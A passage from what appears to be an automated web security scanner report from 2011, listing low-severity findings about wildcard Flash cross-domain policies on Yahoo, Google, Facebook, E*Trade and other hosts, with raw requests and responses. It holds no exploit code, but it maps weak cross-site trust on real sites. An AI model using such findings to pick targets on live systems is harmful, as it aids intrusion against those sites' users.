SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.75. http://music.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.yahoo.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 265
Content-Type: text/xml
Last-Modified: Fri, 12 May 2006 20:13:33 GMT
Accept-Ranges: bytes
ETag: "30a7778b076c61:16afec"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 12:45:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.76. http://new.music.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: new.music.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 22 Aug 2011 13:09:31 GMT
Accept-Ranges: bytes
Content-Length: 287
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="l.yimg.com" secure="false"/>
...[SNIP]...

3.77. http://omg.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: omg.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:20 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 28 Mar 2011 09:57:27 GMT
Accept-Ranges: bytes
Content-Length: 259
Content-Type: application/xml
Age: 0
Server: YTS/1.20.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.78. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.79. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 05 Sep 2011 23:23:50 GMT
Expires: Tue, 06 Sep 2011 23:23:50 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 47163
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.80. http://realestate.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: realestate.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.81. http://scottrade.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: scottrade.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:47 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "9d595a-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

3.82. http://search.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 29 Oct 2009 00:28:40 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.83. http://shopping.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: shopping.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/x-httpd-template

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.84. http://sports.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sports.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host
Last-Modified: Mon, 28 Sep 2009 17:09:24 GMT
Accept-Ranges: bytes
Content-Length: 346
Content-Type: application/xml
Age: 0
Via: HTTP/1.1 r5.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mlb.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" secure="false" />
...[SNIP]...

3.85. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:41 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.86. https://us.etrade.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.etrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:08 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 16:10:27 GMT
ETag: "119-4cbdc2f3"
Accept-Ranges: bytes
Content-Length: 281
Keep-Alive: timeout=60, max=399
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.etrade.com" />
<allow-access-from domain="a248.e.akamai.net" />
<allow-access-from domain="*.etradegrp.com" />
...[SNIP]...

3.87. http://video.music.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml